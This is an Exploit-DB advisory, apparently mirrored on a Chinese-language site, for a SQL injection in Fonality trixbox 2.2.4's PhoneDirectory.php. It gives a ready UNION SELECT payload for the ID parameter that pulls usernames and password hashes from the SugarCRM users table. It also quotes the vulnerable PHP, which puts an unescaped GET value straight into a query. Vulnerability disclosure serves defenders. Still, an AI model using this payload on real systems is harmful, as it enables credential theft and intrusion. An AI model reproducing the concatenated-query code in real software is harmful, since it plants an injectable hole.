Fonality trixbox 2.2.4 – ‘PhonecDirectory.php’ SQL Injection

  • 作者: NorSlacker
    日期: 2010-02-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11508/
  • # Software Link: http://trixbox.org/downloads
    # Version: 2.2.4
    # Code : 
    http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
    
    Example (Grab users / password hashes from sugarcrm) 
    http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
    
    
    PhoneDirectory.php vulnerable code:
    # If the variable "ID" is passed in through the GET string, then display
    # extension, phone number and cell phone number for that record with the dial
    # key functionality
    if ($ID) {
     $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
    
     $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
     $Query .= "FROM contacts WHERE id = '$ID' ";
     $Query .= "ORDER BY last_name ";
     $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
    
     ...
    
    }
    
    #norslacker [at] gmail [dot] com